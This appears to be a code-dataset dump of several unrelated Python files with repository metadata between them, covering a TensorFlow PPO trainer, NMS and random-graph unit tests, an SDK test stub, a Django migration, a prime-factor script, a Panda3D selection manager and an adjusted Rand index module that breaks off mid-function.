class PPOTrain:
    """Builds the TF1 training graph for PPO's clipped surrogate objective.

    Combines the clipped policy ratio loss, a value-function loss and an
    entropy bonus into a single scalar that Adam maximizes (by minimizing
    its negation).  `Policy` and `Old_Policy` are expected to expose
    `act_probs`, `v_preds`, `obs` and `get_trainable_variables()`.
    """
    def __init__(self, Policy, Old_Policy, gamma=0.95, clip_value=0.2, c_1=1, c_2=0.01):
        """
        :param Policy:
        :param Old_Policy:
        :param gamma:
        :param clip_value:
        :param c_1: parameter for value difference
        :param c_2: parameter for entropy bonus
        """
        self.Policy = Policy
        self.Old_Policy = Old_Policy
        self.gamma = gamma
        pi_trainable = self.Policy.get_trainable_variables()
        old_pi_trainable = self.Old_Policy.get_trainable_variables()
        # assign_operations for policy parameter values to old policy parameters
        with tf.variable_scope('assign_op'):
            self.assign_ops = []
            for v_old, v in zip(old_pi_trainable, pi_trainable):
                self.assign_ops.append(tf.assign(v_old, v))
        # inputs for train_op
        with tf.variable_scope('train_inp'):
            self.actions = tf.placeholder(dtype=tf.int32, shape=[None], name='actions')
            self.rewards = tf.placeholder(dtype=tf.float32, shape=[None], name='rewards')
            self.v_preds_next = tf.placeholder(dtype=tf.float32, shape=[None], name='v_preds_next')
            self.gaes = tf.placeholder(dtype=tf.float32, shape=[None], name='gaes')
        act_probs = self.Policy.act_probs
        act_probs_old = self.Old_Policy.act_probs
        # probabilities of actions which agent took with policy
        act_probs = act_probs * tf.one_hot(indices=self.actions, depth=act_probs.shape[1])
        act_probs = tf.reduce_sum(act_probs, axis=1)
        # probabilities of actions which agent took with old policy
        act_probs_old = act_probs_old * tf.one_hot(indices=self.actions, depth=act_probs_old.shape[1])
        act_probs_old = tf.reduce_sum(act_probs_old, axis=1)
        with tf.variable_scope('loss/clip'):
            # exp(log p - log p_old) is numerically gentler than a direct divide.
            # ratios = tf.divide(act_probs, act_probs_old)
            ratios = tf.exp(tf.log(act_probs) - tf.log(act_probs_old))
            clipped_ratios = tf.clip_by_value(ratios, clip_value_min=1 - clip_value, clip_value_max=1 + clip_value)
            loss_clip = tf.minimum(tf.multiply(self.gaes, ratios), tf.multiply(self.gaes, clipped_ratios))
            loss_clip = tf.reduce_mean(loss_clip)
            tf.summary.scalar('loss_clip', loss_clip)
        # construct computation graph for loss of value function
        with tf.variable_scope('loss/vf'):
            v_preds = self.Policy.v_preds
            loss_vf = tf.squared_difference(self.rewards + self.gamma * self.v_preds_next, v_preds)
            loss_vf = tf.reduce_mean(loss_vf)
            tf.summary.scalar('loss_vf', loss_vf)
        # construct computation graph for loss of entropy bonus
        with tf.variable_scope('loss/entropy'):
            entropy = -tf.reduce_sum(self.Policy.act_probs *
                                     tf.log(tf.clip_by_value(self.Policy.act_probs, 1e-10, 1.0)), axis=1)
            entropy = tf.reduce_mean(entropy, axis=0)  # mean of entropy of pi(obs)
            tf.summary.scalar('entropy', entropy)
        with tf.variable_scope('loss'):
            loss = loss_clip - c_1 * loss_vf + c_2 * entropy
            loss = -loss  # minimize -loss == maximize loss
            tf.summary.scalar('loss', loss)
        self.merged = tf.summary.merge_all()
        optimizer = tf.train.AdamOptimizer(learning_rate=1e-4, epsilon=1e-5)
        self.train_op = optimizer.minimize(loss, var_list=pi_trainable)

    def train(self, obs, actions, rewards, v_preds_next, gaes):
        """Run one optimization step on the current default session."""
        tf.get_default_session().run([self.train_op], feed_dict={self.Policy.obs: obs,
                                                                 self.Old_Policy.obs: obs,
                                                                 self.actions: actions,
                                                                 self.rewards: rewards,
                                                                 self.v_preds_next: v_preds_next,
                                                                 self.gaes: gaes})

    def get_summary(self, obs, actions, rewards, v_preds_next, gaes):
        """Evaluate the merged TensorBoard summaries for the given batch."""
        return tf.get_default_session().run([self.merged], feed_dict={self.Policy.obs: obs,
                                                                      self.Old_Policy.obs: obs,
                                                                      self.actions: actions,
                                                                      self.rewards: rewards,
                                                                      self.v_preds_next: v_preds_next,
                                                                      self.gaes: gaes})

    def assign_policy_parameters(self):
        # assign policy parameter values to old policy parameters
        return tf.get_default_session().run(self.assign_ops)

    def get_gaes(self, rewards, v_preds, v_preds_next):
        """Generalized advantage estimates for one trajectory (pure Python)."""
        deltas = [r_t + self.gamma * v_next - v for r_t, v_next, v in zip(rewards, v_preds_next, v_preds)]
        # calculate generative advantage estimator(lambda = 1), see ppo paper eq(11)
        gaes = copy.deepcopy(deltas)
        for t in reversed(range(len(gaes) - 1)):  # is T-1, where T is time step which run policy
            gaes[t] = gaes[t] + self.gamma * gaes[t + 1]
        return gaes
"chagmgang@gmail.com"
] | chagmgang@gmail.com |
e09eefe38c46144b260e759163fdbc18fd82f227 | 1b8fba01309da37f8d0ff408765c1d545fc588d6 | /tests/modeling/test_nms.py | 56bdfdf0b14eb53c31feaaf464bd4eee1bfa11fd | [
"Apache-2.0"
] | permissive | supriyar/d2go | 9bd54bcb2704c91d7bf0d5fceab2ac4f23d59346 | 9dc1600b05ecf60fab556599b4c0bc6c32837449 | refs/heads/main | 2023-08-11T16:19:50.578547 | 2021-10-01T17:43:32 | 2021-10-01T17:44:49 | 413,646,825 | 0 | 0 | Apache-2.0 | 2021-10-05T02:20:59 | 2021-10-05T02:20:58 | null | UTF-8 | Python | false | false | 7,617 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
import numpy as np
import torch
from detectron2.layers import nms as box_nms
class TestNMS(unittest.TestCase):
    """Checks detectron2's box NMS against fixtures ported from Caffe2.

    The box/score constants and expected keep-indices are copied verbatim
    from the corresponding Caffe2 C++ unit tests.
    """
    def test_nms_cpu(self):
        """Match unit test UtilsNMSTest.TestNMS in
        caffe2/operators/generate_proposals_op_util_nms_test.cc
        """
        # Flat [x1, y1, x2, y2, score] records, reshaped to (N, 5) below.
        inputs = (
            np.array(
                [
                    10,
                    10,
                    50,
                    60,
                    0.5,
                    11,
                    12,
                    48,
                    60,
                    0.7,
                    8,
                    9,
                    40,
                    50,
                    0.6,
                    100,
                    100,
                    150,
                    140,
                    0.9,
                    99,
                    110,
                    155,
                    139,
                    0.8,
                ]
            )
            .astype(np.float32)
            .reshape(-1, 5)
        )
        boxes = torch.from_numpy(inputs[:, :4])
        scores = torch.from_numpy(inputs[:, 4])
        test_thresh = [0.1, 0.3, 0.5, 0.8, 0.9]
        gt_indices = [[1, 3], [1, 3], [1, 3], [1, 2, 3, 4], [0, 1, 2, 3, 4]]
        for thresh, gt_index in zip(test_thresh, gt_indices):
            keep_indices = box_nms(boxes, scores, thresh)
            # Sort so the comparison is order-independent.
            keep_indices = np.sort(keep_indices)
            np.testing.assert_array_equal(keep_indices, np.array(gt_index))
    def test_nms1_cpu(self):
        """Match unit test UtilsNMSTest.TestNMS1 in
        caffe2/operators/generate_proposals_op_util_nms_test.cc
        """
        boxes = torch.from_numpy(
            np.array(
                [
                    [350.9821, 161.8200, 369.9685, 205.2372],
                    [250.5236, 154.2844, 274.1773, 204.9810],
                    [471.4920, 160.4118, 496.0094, 213.4244],
                    [352.0421, 164.5933, 366.4458, 205.9624],
                    [166.0765, 169.7707, 183.0102, 232.6606],
                    [252.3000, 183.1449, 269.6541, 210.6747],
                    [469.7862, 162.0192, 482.1673, 187.0053],
                    [168.4862, 174.2567, 181.7437, 232.9379],
                    [470.3290, 162.3442, 496.4272, 214.6296],
                    [251.0450, 155.5911, 272.2693, 203.3675],
                    [252.0326, 154.7950, 273.7404, 195.3671],
                    [351.7479, 161.9567, 370.6432, 204.3047],
                    [496.3306, 161.7157, 515.0573, 210.7200],
                    [471.0749, 162.6143, 485.3374, 207.3448],
                    [250.9745, 160.7633, 264.1924, 206.8350],
                    [470.4792, 169.0351, 487.1934, 220.2984],
                    [474.4227, 161.9546, 513.1018, 215.5193],
                    [251.9428, 184.1950, 262.6937, 207.6416],
                    [252.6623, 175.0252, 269.8806, 213.7584],
                    [260.9884, 157.0351, 288.3554, 206.6027],
                    [251.3629, 164.5101, 263.2179, 202.4203],
                    [471.8361, 190.8142, 485.6812, 220.8586],
                    [248.6243, 156.9628, 264.3355, 199.2767],
                    [495.1643, 158.0483, 512.6261, 184.4192],
                    [376.8718, 168.0144, 387.3584, 201.3210],
                    [122.9191, 160.7433, 172.5612, 231.3837],
                    [350.3857, 175.8806, 366.2500, 205.4329],
                    [115.2958, 162.7822, 161.9776, 229.6147],
                    [168.4375, 177.4041, 180.8028, 232.4551],
                    [169.7939, 184.4330, 181.4767, 232.1220],
                    [347.7536, 175.9356, 355.8637, 197.5586],
                    [495.5434, 164.6059, 516.4031, 207.7053],
                    [172.1216, 194.6033, 183.1217, 235.2653],
                    [264.2654, 181.5540, 288.4626, 214.0170],
                    [111.7971, 183.7748, 137.3745, 225.9724],
                    [253.4919, 186.3945, 280.8694, 210.0731],
                    [165.5334, 169.7344, 185.9159, 232.8514],
                    [348.3662, 184.5187, 354.9081, 201.4038],
                    [164.6562, 162.5724, 186.3108, 233.5010],
                    [113.2999, 186.8410, 135.8841, 219.7642],
                    [117.0282, 179.8009, 142.5375, 221.0736],
                    [462.1312, 161.1004, 495.3576, 217.2208],
                    [462.5800, 159.9310, 501.2937, 224.1655],
                    [503.5242, 170.0733, 518.3792, 209.0113],
                    [250.3658, 195.5925, 260.6523, 212.4679],
                    [108.8287, 163.6994, 146.3642, 229.7261],
                    [256.7617, 187.3123, 288.8407, 211.2013],
                    [161.2781, 167.4801, 186.3751, 232.7133],
                    [115.3760, 177.5859, 163.3512, 236.9660],
                    [248.9077, 188.0919, 264.8579, 207.9718],
                    [108.1349, 160.7851, 143.6370, 229.6243],
                    [465.0900, 156.7555, 490.3561, 213.5704],
                    [107.5338, 173.4323, 141.0704, 235.2910],
                ]
            ).astype(np.float32)
        )
        scores = torch.from_numpy(
            np.array(
                [
                    0.1919,
                    0.3293,
                    0.0860,
                    0.1600,
                    0.1885,
                    0.4297,
                    0.0974,
                    0.2711,
                    0.1483,
                    0.1173,
                    0.1034,
                    0.2915,
                    0.1993,
                    0.0677,
                    0.3217,
                    0.0966,
                    0.0526,
                    0.5675,
                    0.3130,
                    0.1592,
                    0.1353,
                    0.0634,
                    0.1557,
                    0.1512,
                    0.0699,
                    0.0545,
                    0.2692,
                    0.1143,
                    0.0572,
                    0.1990,
                    0.0558,
                    0.1500,
                    0.2214,
                    0.1878,
                    0.2501,
                    0.1343,
                    0.0809,
                    0.1266,
                    0.0743,
                    0.0896,
                    0.0781,
                    0.0983,
                    0.0557,
                    0.0623,
                    0.5808,
                    0.3090,
                    0.1050,
                    0.0524,
                    0.0513,
                    0.4501,
                    0.4167,
                    0.0623,
                    0.1749,
                ]
            ).astype(np.float32)
        )
        # Expected survivors at IoU threshold 0.5, per the Caffe2 fixture.
        gt_indices = np.array(
            [
                1,
                6,
                7,
                8,
                11,
                12,
                13,
                14,
                17,
                18,
                19,
                21,
                23,
                24,
                25,
                26,
                30,
                32,
                33,
                34,
                35,
                37,
                43,
                44,
                47,
                50,
            ]
        )
        keep_indices = box_nms(boxes, scores, 0.5)
        keep_indices = np.sort(keep_indices)
        np.testing.assert_array_equal(keep_indices, gt_indices)
if __name__ == "__main__":
unittest.main()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
6beb23d647745a308be0869da61a993aa0aff98b | ccf94dcb6b1500fcbbd56964ae8c4832a496b8b3 | /python/baiduads-sdk-auto/test/test_get_hit_customer_policy_response_wrapper.py | 00a7cf98be3ac3940848931d77db3651c4cc6030 | [
"Apache-2.0"
] | permissive | baidu/baiduads-sdk | 24c36b5cf3da9362ec5c8ecd417ff280421198ff | 176363de5e8a4e98aaca039e4300703c3964c1c7 | refs/heads/main | 2023-06-08T15:40:24.787863 | 2023-05-20T03:40:51 | 2023-05-20T03:40:51 | 446,718,177 | 16 | 11 | Apache-2.0 | 2023-06-02T05:19:40 | 2022-01-11T07:23:17 | Python | UTF-8 | Python | false | false | 1,158 | py | """
dev2 api schema
'dev2.baidu.com' api schema # noqa: E501
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import baiduads
from baiduads.common.model.api_response_header import ApiResponseHeader
from baiduads.shieldfunction.model.get_hit_customer_policy_response_wrapper_body import GetHitCustomerPolicyResponseWrapperBody
globals()['ApiResponseHeader'] = ApiResponseHeader
globals()['GetHitCustomerPolicyResponseWrapperBody'] = GetHitCustomerPolicyResponseWrapperBody
from baiduads.shieldfunction.model.get_hit_customer_policy_response_wrapper import GetHitCustomerPolicyResponseWrapper
class TestGetHitCustomerPolicyResponseWrapper(unittest.TestCase):
    """GetHitCustomerPolicyResponseWrapper unit test stubs"""
    # Auto-generated (OpenAPI Generator) placeholder test case; no fixture
    # setup or teardown is required yet.
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def testGetHitCustomerPolicyResponseWrapper(self):
        """Test GetHitCustomerPolicyResponseWrapper"""
        # FIXME: construct object with mandatory attributes with example values
        # model = GetHitCustomerPolicyResponseWrapper() # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
"tokimekiyxp@foxmail.com"
] | tokimekiyxp@foxmail.com |
911ca58c9609243397f7590c354a1e147e710862 | c4edcdff1a4ebe45e7198aaf65caf3a1f71053ab | /git_version/migrations/0001_initial.py | 4d5f800ce654c259c96cf37e3a2aabd9f1291b5b | [] | no_license | FriskByBergen/friskby | 5584cb2ea099e2c0fecd4762f56effc714fd06ee | 7a444af87c23ffd6b638055e49ccd608efcd3ee6 | refs/heads/master | 2020-05-21T15:09:43.367245 | 2017-06-06T17:48:58 | 2017-06-06T17:48:58 | 45,236,960 | 3 | 10 | null | 2017-06-06T17:48:59 | 2015-10-30T07:58:33 | Python | UTF-8 | Python | false | false | 809 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-30 05:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial auto-generated migration: creates the GitVersion table.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='GitVersion',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('ref', models.CharField(max_length=128, verbose_name='Git ref')),
                ('repo', models.CharField(default='https://github.com/FriskbyBergen/friskby', max_length=128, verbose_name='Git repo')),
                ('description', models.CharField(max_length=256, verbose_name='Description')),
            ],
        ),
    ]
| [
"joakim.hove@gmail.com"
] | joakim.hove@gmail.com |
a86d76d1dc046199d8b9687e4fd0dd3c904cc787 | 54d8a05e0238e96eb43e4893bacba024e490bf11 | /python-projects/algo_and_ds/prime_factoras.py | bbf5b73c210c45398fd5235ff4e25e5c40b05128 | [] | no_license | infinite-Joy/programming-languages | 6ce05aa03afd7edeb0847c2cc952af72ad2db21e | 0dd3fdb679a0052d6d274d19040eadd06ae69cf6 | refs/heads/master | 2023-05-29T10:34:44.075626 | 2022-07-18T13:53:02 | 2022-07-18T13:53:02 | 30,753,185 | 3 | 5 | null | 2023-05-22T21:54:46 | 2015-02-13T11:14:25 | Jupyter Notebook | UTF-8 | Python | false | false | 707 | py | # find the prime factors based on the geeks for geeks tut
from math import sqrt
def is_prime(n):
    """Return True if ``n`` is prime.

    Uses 6k +/- 1 trial division: after ruling out divisibility by 2 and 3,
    every remaining prime factor has the form 6k - 1 or 6k + 1, so only the
    candidates 5, 7, 11, 13, ... up to sqrt(n) need testing.
    """
    if n < 2:
        # Bug fix: the old code returned 1 (truthy) for n == 1, wrongly
        # classifying 1 (and implicitly 0 / negatives fell through) as prime.
        return False
    if n == 2:
        return True
    if n == 3:
        return True
    if n % 2 == 0 or n % 3 == 0:
        return False
    # Bug fix: the upper bound must include sqrt(n).  The old
    # range(5, int(sqrt(n)), 6) stopped short, so squares of primes such
    # as 25 and 121 were reported as prime.
    for i in range(5, int(sqrt(n)) + 1, 6):
        if (n % i == 0) or (n % (i + 2) == 0):
            return False
    return True
def print_prime_factors(n):
    """Print the prime factorisation of ``n``, one factor per line.

    Each prime is printed once per occurrence (e.g. 84 -> 2, 2, 3, 7).
    Values <= 1 have no prime factors, so only the header line is printed.
    """
    print("printing prime factors of {}".format(n))
    if n <= 1:
        return
    i = 2
    while n >= i * i:
        # By the time i is reached, every smaller prime has been divided
        # out, so a composite i can never divide n -- no explicit primality
        # test is needed (the old is_prime() call was redundant).
        while n % i == 0:
            print(i)
            # Bug fix: use floor division so n stays an exact int; the old
            # `n /= i` produced floats, risking precision loss for large n.
            n //= i
        i += 1
    if n > 1:
        # Whatever remains above sqrt(original n) is itself prime.
        print(n)
# Demo runs: 450 = 2 * 3^2 * 5^2 and 84 = 2^2 * 3 * 7.
print_prime_factors(450)
print_prime_factors(84)
| [
"joydeepubuntu@gmail.com"
] | joydeepubuntu@gmail.com |
b8688c90ac225fe9f656e6f7b494f754c01ab1bd | f02e654d5590a861804e3220ed76ba2192e1699b | /simulator/selectionmanager.py | 9ad5c1ccfd532073cda2be6ad7e765cab0e059be | [
"BSD-3-Clause"
] | permissive | AmarNathH/software | 73e2afd3affaf2c1595b406480edac8b8fb2fcac | e225810c7501250f48add43349a64f49450cc79f | refs/heads/master | 2020-12-02T20:50:18.439874 | 2017-07-03T16:51:07 | 2017-07-03T16:51:07 | 96,219,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,940 | py |
from direct.showbase.DirectObject import DirectObject
from panda3d.core import KeyboardButton
from panda3d.core import MouseButton
from panda3d.core import NodePath
from panda3d.core import Point3
from panda3d.core import Vec4
from mouseevent import MouseEventListener
from selectionengine import SelectionEngine
from handles import Handle
from cameracontroller import CameraController, EVT_CAMERA_MODE, TRACKBALL
class SelectionManager(DirectObject, MouseEventListener):
    """Tracks the set of selected scene nodes and drives the edit Handle.

    Listens for mouse events from a SelectionEngine and from registered
    nodes, maintains `self.selection`, and switches between normal and
    edit mode (right-button press).  Python 2 code (print statements,
    xrange).
    """
    defaultMgr = None
    @classmethod
    def getDefault(cls):
        # Lazily create the process-wide singleton.
        if cls.defaultMgr == None:
            cls.defaultMgr = SelectionManager()
        return cls.defaultMgr
    @classmethod
    def setDefault(cls, manager):
        cls.defaultMgr = manager
    def __init__(self, selectionEngine = None):
        self.selection = []
        self.enabled = False
        self.editMode = None
        if selectionEngine == None:
            selectionEngine = SelectionEngine.getDefault()
        self.engine = selectionEngine
        self.engine.addMouseListener(self)
        self.handle = Handle()
        self.handle.setClients([])
        render.attachNewNode(self.handle)
        # Selection is only active while the camera is in trackball mode.
        CameraController.getInstance().addEventHandler(EVT_CAMERA_MODE,
                                                       self._cameraModeHandler)
        self.accept('f', self._setFocus)
    def getSelectionCenter(self):
        """Center of the combined tight bounding box of the selection.

        NOTE: `min`/`max` shadow the builtins here (legacy code, left
        unchanged).  Bounds of nodes not parented to `render` are shifted
        into world space.
        """
        if not self.selection:
            return Point3()
        else:
            min, max = Point3(), Point3()
            tmpmin, tmpmax = Point3(), Point3()
            np = NodePath(self.selection[0])
            np.calcTightBounds(min, max)
            min += np.getPos(render) - np.getPos()
            max += np.getPos(render) - np.getPos()
            for i in xrange(1, len(self.selection)):
                np = NodePath(self.selection[i])
                np.calcTightBounds(tmpmin, tmpmax)
                if np.getParent() != render:
                    tmpmin += np.getPos(render) - np.getPos()
                    tmpmax += np.getPos(render) - np.getPos()
                min = min.fmin(tmpmin)
                max = max.fmax(tmpmax)
            return Point3(min + (max - min)/2)
    def _setFocus(self):
        # This function handles presses of the F key.
        if self.selection:
            CameraController.getInstance().setFocus(self.getSelectionCenter())
        else:
            CameraController.getInstance().setFocus(Point3())
    def _cameraModeHandler(self, cameraController):
        # Enable selection only while the camera is in trackball mode.
        if cameraController.getCameraMode() == TRACKBALL:
            self.enable(True)
        else:
            self.enable(False)
    def enable(self, enabled=True):
        # Disabling clears the current selection and detaches the handle.
        if self.enabled and enabled == False:
            self.deselectAll()
            self.handle.setClients([])
        self.enabled = enabled
    def registerNode(self, node):
        print 'registering new node to selmgr', node
        node.addMouseListener(self)
    def removeNode(self, node):
        node.removeMouseListener(self)
        if node in self.selection:
            node.setSelected(False)
            self.selection.remove(node)
    def deselectAll(self):
        for node in self.selection:
            node.setSelected(False)
        self.selection = []
    def _setEditMode(self, editMode):
        # Switch highlight colour and drop the selection on mode change.
        if self.editMode == editMode:
            return
        self.editMode = editMode
        if editMode:
            self.engine.setHighlightColor(Vec4(1, 0.8, 0, 1))
        else:
            self.engine.setHighlightColor(Vec4(0.6, 0.6, 1, 1))
        self.deselectAll()
    def mousePressed(self, event):
        """Core click handler: updates the selection and the edit handle.

        Ctrl-clicks are ignored; a click on empty space (the engine
        itself) clears the selection unless Shift is held.
        """
        print 'got mouse pressed event from', event.sender
        if (not self.enabled or
            event.modifiers.isDown(KeyboardButton.control())):
            print 'short circuiting'
            return
        shiftDown = event.modifiers.isDown(KeyboardButton.shift())
        if event.sender == self.engine:
            if not shiftDown:
                self.deselectAll()
        else:
            # Right button (three) enters edit mode.
            self._setEditMode(event.modifiers.isDown(MouseButton.three()))
            node = event.sender
            if shiftDown:
                # Shift-clicking a node toggles its selected state.
                if node.isSelected():
                    self.selection.remove(node)
                    node.setSelected(False)
                else:
                    self.selection.append(node)
                    node.setSelected(True)
            elif len(self.selection) == 1 and node.isSelected():
                # This is already the only node selected.
                return
            else:
                print 'selecting', node
                self.deselectAll()
                node.setSelected(True)
                self.selection.append(node)
        if self.editMode:
            self.handle.setClients([NodePath(n) for n in self.selection],
                                   self.getSelectionCenter())
        else:
            self.handle.setClients([])
| [
"software@cuauv.org"
] | software@cuauv.org |
bcc70fcaea7e68b2cda51f40ce9e39dcc644bcae | 8f0b0ec0a0a2db00e2134b62a1515f0777d69060 | /scripts/study_case/ID_4/test/utils/test_random.py | 8fd3068976605ffd63ea7b8c208e9a7cd2274945 | [
"Apache-2.0",
"MIT"
] | permissive | Liang813/GRIST | 2add5b4620c3d4207e7661eba20a79cfcb0022b5 | 544e843c5430abdd58138cdf1c79dcf240168a5f | refs/heads/main | 2023-06-09T19:07:03.995094 | 2021-06-30T05:12:19 | 2021-06-30T05:12:19 | 429,016,034 | 0 | 0 | Apache-2.0 | 2021-11-17T11:19:48 | 2021-11-17T11:19:47 | null | UTF-8 | Python | false | false | 1,382 | py | import torch
import numpy as np
from scripts.study_case.ID_4.torch_geometric.utils import (
erdos_renyi_graph, stochastic_blockmodel_graph, barabasi_albert_graph)
def test_erdos_renyi_graph():
    # The expected edge lists are tied to this exact torch seed; they will
    # change if the generator's sampling order changes.
    torch.manual_seed(1234)
    edge_index = erdos_renyi_graph(5, 0.2, directed=False)
    assert edge_index.tolist() == [
        [0, 1, 1, 1, 2, 4],
        [1, 0, 2, 4, 1, 1],
    ]
    edge_index = erdos_renyi_graph(5, 0.5, directed=True)
    assert edge_index.tolist() == [
        [1, 1, 2, 2, 3, 4, 4, 4],
        [0, 3, 0, 4, 0, 0, 1, 3],
    ]
def test_stochastic_blockmodel_graph():
    # Seed-dependent expectations, as in test_erdos_renyi_graph above.
    torch.manual_seed(12345)
    block_sizes = [2, 2, 4]
    # edge_probs[i][j] is the edge probability between blocks i and j.
    edge_probs = [
        [0.25, 0.05, 0.02],
        [0.05, 0.35, 0.07],
        [0.02, 0.07, 0.40],
    ]
    edge_index = stochastic_blockmodel_graph(
        block_sizes, edge_probs, directed=False)
    assert edge_index.tolist() == [
        [2, 3, 4, 4, 5, 5, 6, 7, 7, 7],
        [3, 2, 5, 7, 4, 7, 7, 4, 5, 6],
    ]
    edge_index = stochastic_blockmodel_graph(
        block_sizes, edge_probs, directed=True)
    assert edge_index.tolist() == [
        [0, 1, 3, 5, 6, 6, 7, 7],
        [3, 3, 2, 4, 4, 7, 5, 6],
    ]
def test_barabasi_albert_graph():
    # Both torch and numpy RNGs are seeded: the generator draws from both.
    # Only the edge count is asserted, not the exact edges.
    torch.manual_seed(12345)
    np.random.seed(12345)
    edge_index = barabasi_albert_graph(num_nodes=8, num_edges=3)
    assert edge_index.size() == (2, 26)
| [
"793679547@qq.com"
] | 793679547@qq.com |
b0140e72078c2d355dadca3442139240028b1641 | d6d6e3bebfca91ae10d1a269ec7d060a6bf3c8cd | /RMB_Classify/__init__.py | f0fbf238946ec3f152a96441fbb9ccf096fb845b | [] | no_license | darrenzhang1007/PyTorch_From_Zero_To_One | a1bb939cafd546e4625b0df0123c0f86d2af6499 | b94e1cca2e28fb22accd2eee859d13e9e7bc25f2 | refs/heads/master | 2022-10-17T03:53:42.388743 | 2020-06-11T07:54:33 | 2020-06-11T07:54:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | # -*- coding: utf-8 -*-
# @Time : 2020/5/4 14:45
# @Author : DarrenZhang
# @FileName: __init__.py.py
# @Software: PyCharm
# @Blog :https://www.yuque.com/darrenzhang
| [
"785320051@qq.com"
] | 785320051@qq.com |
04e8f3ab6547419999cee7969b5d8df80d311730 | 81f9ba9d4ddf45d865f5bc23d4c61de13476d64d | /irm/rand.py | dfea41fae06b988f881d8d9ad08ced07c7941c61 | [] | no_license | ericmjonas/netmotifs | cad6e2baf12cb218e15e02e5e362ef0b609978c3 | 94e1df8895b6a4f2e45ab0e918b1eb3ed16fca99 | refs/heads/master | 2020-12-25T16:49:28.618393 | 2016-08-11T00:50:30 | 2016-08-11T00:50:30 | 10,423,525 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,774 | py | import numpy as np
import scipy
import scipy.misc
from nose.tools import *
#import pyximport; pyximport.install()
#import fastrand
def canonicalize_assignment_vector(x):
    """
    Take in an assignment vector and redo the assignments such that
    the assignment values are monotonic from 0 to GRPMAX.

    Uses np.unique(return_inverse=True): the inverse indices are exactly
    each element's rank among the sorted unique labels, which is the same
    relabelling the original dict-based loop produced.  The result keeps
    the input's dtype (matching the old np.zeros_like behaviour).
    """
    arr = np.asarray(x)
    # inverse[i] is the index of arr[i] within the sorted unique values,
    # i.e. the canonical 0..K-1 group label.
    _, inverse = np.unique(arr, return_inverse=True)
    return inverse.reshape(arr.shape).astype(arr.dtype)
def assignment_vector_to_list_of_sets(x):
    """Group element indices by their assignment label.

    Returns a list of sets, one per distinct label in *x* in order of
    first occurrence; each set holds the indices assigned that label.
    """
    # The original computed np.unique(x) and immediately shadowed the
    # result in the loop variable -- that call was dead code, removed here.
    lut = {}
    for idx, label in enumerate(x):
        lut.setdefault(label, set()).add(idx)
    # Return a real list (not a Python-3 dict view) so callers can index
    # and len() it, as the Python-2 original allowed.
    return list(lut.values())
def compute_adj_rand_index(ground_truth_partition, found_partition):
    '''
    Computes the adjusted rand index of the groups in the found partition as
    compared to the ground truth partition. Both partitions should be a
    canonical mapping such that

    partition[i] = group containing item i (None if in no group)

    Returns a float; 1.0 means the clusterings are identical up to
    relabelling.

    Side effect (unchanged from the original): any None entries are
    rewritten *in place* to a fresh catch-all group id.

    Fixes: scipy.misc.comb was removed in SciPy 1.3, so the equivalent
    scipy.special.comb is used; max() over a list containing None raises
    TypeError on Python 3, so only non-None labels are considered.
    '''
    assert len(ground_truth_partition) == len(found_partition)

    # replace any Nones with the next available group id
    no_assignment_id = max(
        (v for v in ground_truth_partition + found_partition if v is not None),
        default=-1) + 1
    for part in [ground_truth_partition, found_partition]:
        for i in range(len(part)):
            if part[i] is None:
                part[i] = no_assignment_id
    assert all(x is not None for x in found_partition)
    assert all(x is not None for x in ground_truth_partition)

    num_ground_truth_groups = len(set(ground_truth_partition))
    num_found_groups = len(set(found_partition))

    # These two edge cases cause a divide-by-zero error if the ground truth
    # and found partitions are identical. Don't bother to calculate.
    if (((num_found_groups == 1) and (num_ground_truth_groups == 1))
        or ((num_found_groups == len(ground_truth_partition))
            and num_ground_truth_groups == len(ground_truth_partition))):
        return 1.0

    # contingency_table[found_group, gt_group] counts shared items; the
    # labels are assumed canonical (0..K-1) so they can index directly.
    contingency_table = np.zeros((num_found_groups,
                                  num_ground_truth_groups))
    for item, gt_group in enumerate(ground_truth_partition):
        found_group = found_partition[item]
        contingency_table[found_group, gt_group] += 1

    # For more details on this algorithm (since this code is not the most
    # readable or best named ever), see
    # http://faculty.washington.edu/kayee/pca/supp.pdf
    # or http://en.wikipedia.org/wiki/Adjusted_rand_index
    all_entries = np.sum(scipy.special.comb(contingency_table, 2))
    rows_collapsed = np.sum(scipy.special.comb(np.sum(contingency_table, 0), 2))
    cols_collapsed = np.sum(scipy.special.comb(np.sum(contingency_table, 1), 2))
    num_items = scipy.special.comb(len(ground_truth_partition), 2)
    ari = ( (all_entries - (rows_collapsed * cols_collapsed / num_items))
            / ( ((rows_collapsed + cols_collapsed) / 2)
                - ((rows_collapsed * cols_collapsed) / num_items)))
    assert not np.isnan(ari)
    return ari
def test_ari():
    # Relabelled-but-identical partitions must score a perfect ARI.
    # (assert_almost_equal comes from the nose.tools star-import.)
    assert_almost_equal(compute_adj_rand_index([0, 0, 0, 1, 1, 1,2,2,2],
                                               [1, 1, 1, 2, 2, 2, 0, 0, 0]),
                        1.0, 2)
def twocomb(x):
    """Number of unordered pairs from x items, i.e. binom(x, 2), as a float.

    Works elementwise on numpy arrays as well as on scalars.
    """
    return x * (x - 1) * 0.5
def compute_adj_rand_index_fast(list_of_sets_U, list_of_sets_V):
    """Adjusted Rand index for two clusterings given as lists of index sets.

    Builds the contingency table of pairwise set intersections and applies
    the standard pair-counting ARI formula.
    """
    sizes_u = np.array([len(s) for s in list_of_sets_U])
    sizes_v = np.array([len(s) for s in list_of_sets_V])
    # contingency[i, j] = number of items shared by cluster i of U and
    # cluster j of V.
    contingency = np.array(
        [[len(u & v) for v in list_of_sets_V] for u in list_of_sets_U],
        dtype=np.uint32)
    pair_total = np.sum(twocomb(np.array(contingency.flat)))
    pairs_u = np.sum(twocomb(sizes_u))
    pairs_v = np.sum(twocomb(sizes_v))
